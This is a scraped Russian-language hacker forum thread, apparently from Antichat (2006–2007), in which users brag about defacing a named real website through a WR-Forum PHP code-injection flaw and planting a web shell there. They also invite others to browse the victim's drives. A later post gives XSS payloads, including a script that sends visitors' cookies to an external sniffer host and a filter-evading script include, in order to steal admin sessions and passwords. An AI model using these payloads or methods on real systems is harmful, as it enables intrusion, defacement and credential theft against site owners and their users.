Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Дефейс через форум WR-Forum © 1.7 M |

17.05.2006, 17:18
|
|
Участник форума
Регистрация: 21.03.2006
Сообщений: 117
Провел на форуме: 629074
Репутация:
137
|
|
Дефейс через форум WR-Forum © 1.7 M
Значит дефейс делал не я а знакомый ( don_Pedro)
Глюк форума - неправильная проверка названия темы. В назание темы можно написать
Но без
Таким же макаром был вставлен шелл ремвью.
Результат http://www.klipov.net/forum/
http://www.klipov.net/remview.php
Подпись http://www.klipov.net/
По названию видно что клипов там нет. Поэтому заходим на диск D: E: Z: и берём там неклипы, нефильмы и т.д.
Просиба не хамить там (не вы же старались). Ну разве чуть-чуть.
Последний раз редактировалось Brun; 17.05.2006 в 17:26..
|
|
|

17.05.2006, 18:05
|
|
Новичок
Регистрация: 17.05.2006
Сообщений: 3
Провел на форуме: 11313
Репутация:
3
|
|
ну Brun немножно сухо написал.... попробую добавить...
Сначала вытянул пас админа (это другая история  )
так вот, залез в админку.... подумал как залить шел.... Форум, сразу скажу совковый, нет ниодной опции чтобы залить туда какой-нить файл...
нарыл интересную опцию "описание форума"
Попробовал вставить туда
не порулило 
потом начал думать.... в каком виде может сохранятся это описание.... скорее всего это происходит так
PHP код:
$opisanie="opisanie etogo foruma";
это наводит на одну мысль... если форум совковый, так может творцы сего форума не удосужились проверять строку описания, а? 
ну попробовал ввести вот-так
тут немножко обьясню ход мысли...
сначала нам надо сообщить РНР, что переменная, в которую записывается описание форума уже "закончилась". вот для этого ставим
дальше понятно,
и последний штрих
это чтобы не возникло приблизительно вот такой ошибки
Parse error: parse error, unexpected $ in ...
так как в нас остались два символа которые сначала закрывали переменную с описанием форума....
проверил - работает...... ну если работает, то что нам мешает вместо любимого втулить туда код шела? 
кто-то скажет: ведь длина описания наверно регулируется... а фиг вам, таварисчи, если творцы форума ламеры, то они ламеры во всем
вставил код шела, перед этим убрал заработало 
вот так вот 
ЗЫЖ а шо это я под ником don_Pedro не смог зарегицца?  вродь нет такого юзера....
Последний раз редактировалось don Pedro; 17.05.2006 в 19:55..
|
|
|

18.05.2006, 04:37
|
|
Banned
Регистрация: 07.05.2006
Сообщений: 36
Провел на форуме: 96196
Репутация:
-9
|
|
Не тот сайт ломал блин :d , там медленно качается 9кб/с
Кстати там XSS есть ?
Последний раз редактировалось nix; 18.05.2006 в 04:44..
|
|
|

18.05.2006, 10:32
|
|
Новичок
Регистрация: 17.05.2006
Сообщений: 3
Провел на форуме: 11313
Репутация:
3
|
|
2nix
а хз, не проверял, кстати, ты хоть смотрел на тот сайт?? 
прикол в том, что делал его один мего-ламер, хостится это все дело у него на компе дома, кажись в Испании, на винде... а ща самое интересное.... НА ДЕНВЕРЕ 
кстати он типа пропалил.. ну ниче, еще что-нить найдем 
|
|
|

18.05.2006, 11:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме: 8854279
Репутация:
2727
|
|
Сообщение от don Pedro
кстати он типа пропалил.. 
ха, если бы не ставил "типа" деф, то все было бы нормально..
__________________
ПИУ-ПИУ...
|
|
|

18.05.2006, 11:39
|
|
Banned
Регистрация: 14.05.2006
Сообщений: 8
Провел на форуме: 45799
Репутация:
-10
|
|
точнее там идет преобразование функцией eval, без экранирования "
|
|
|

18.05.2006, 13:12
|
|
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме: 732018
Репутация:
117
|
|
вставил код шела, перед этим убрал
заработало 
вот так вот 
А зачем туда вставлять код? Гораздо удобнее сделать include. 
|
|
|

18.05.2006, 13:14
|
|
Новичок
Регистрация: 17.05.2006
Сообщений: 3
Провел на форуме: 11313
Репутация:
3
|
|
не ну да, но...... поперло 
тем более... не хакер я
разве шо чуть-чуть 
Последний раз редактировалось don Pedro; 18.05.2006 в 13:19..
|
|
|

18.09.2007, 23:49
|
|
Познающий
Регистрация: 12.12.2006
Сообщений: 89
Провел на форуме: 500895
Репутация:
60
|
|
Напишу мини-мануал-историю (надо же мне на этом форуме с чего то начинать!)
На форуме WR-Forum © 1.8 совершенно нет проверки на html у себя в подписи... да что там в подписи, вообще практически нигде нету!
Дело было где то часа в 2 ночи... думаю... проект новенький, интересный! есть раздел по JavaScript где мне могут помочь! Но тут столкнулся с неприятностью... В нужном разделе показалось сообщение:
Количество допустимых тем в рубрике исчерпано.
Немного обидевшись решил создать где нить в другом разделе.. и что я увидел:
Код:
index.php?fid=8&newtema=add
Дай ка думаю номер нужного раздела поставлю... и уваля! Работает! вот так и обходим ограничение тем
М... понравилось! решил поиграть с форумом)
гыгы) автор скрипта-редиска!
Код:
index.php?fid=9999&newtema=add
Далее, ввёл номер форума которого нету... и... он есть, наверно "скрытый" раздел...
index.php?fid= x
x-любая цифра
хех... ещё при добавлении сообщения можно спокойно вернуться назад и ещё раз добавить мессагу) короче оспамить легко!
А теперь самое интересное... XSS
У себя в инфе в подписи, да и в других полях анкеты делайте что хотите! =)
Хотим что бы жуткий аллерт досаждал посетителям?
Пишем у себя в статусе:
Код:
<IMG SRC=JaVaScRiPt:alert('XSS by DCRM')>
Хотите стырить куки?
Возьмём к примеру снифер:
Далее подумав, делаем так:
Код:
<script>img.src = "'http://s.netsec.ru/ваш логин.gif?'+document.cookie;"</script>
Но у автора стоит ограничение на длину сообщения... кхм... поиграем по его правилам, не долго думая сделал файлик скрипта и залил к себе на хост... => всё да ничего, но у автор форума сделал замену тексту ссылок на хреф... и это не проблема, достаточно лишь закодировать 1ю букву адреса:
Код:
<SCRIPT SRC="http://%77ww.xxx.xx/x.xx"></script>
И уваля! остаётся только ждать...
И того, это первый мой интересный взлом) спасибо за внимание!
P.s. а дальше дело техники и воображения) Админ есть... куки есть, кстати в незашифрованном виде там пассы...
Последний раз редактировалось DCRM; 18.09.2007 в 23:54..
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|